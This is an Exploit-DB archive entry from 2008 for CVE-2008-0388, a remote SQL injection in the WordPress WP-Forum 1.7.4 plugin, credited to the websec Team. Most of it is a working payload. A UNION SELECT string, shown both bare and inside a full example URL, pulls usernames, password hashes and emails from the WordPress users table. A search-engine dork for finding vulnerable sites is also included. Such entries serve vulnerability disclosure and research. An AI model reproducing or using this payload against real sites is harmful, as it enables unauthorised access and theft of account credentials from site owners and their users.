WordPress plugin WP-Forum 1.7.4 - Remote SQL Injection Vulnerability

2008-01-19T00:00:00
ID EDB-ID:4939
Type exploitdb
Reporter websec Team
Modified 2008-01-19T00:00:00

Description

Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability. CVE-2008-0388. Webapps exploit for php platform

                                        
                                                         remote sql injection exploit
###############################################################
                   

# >>> -::DESCRIPTION== >> WordPress forum plugin by Fredrik Fahlstad. Version: 1.7.4.

# >>> exploit: 1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_users where id=1/*      

(wp_tbv_users)

# >>> google: Fredrik Fahlstad. Version: 1.7.4.

# >>> author  websec Team  ./members =====>  Virus_C, Refresh , Virusa

# >>> page : hacking.ge

###############################################################

this is example

http://www.xxx.com/?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*

# milw0rm.com [2008-01-19]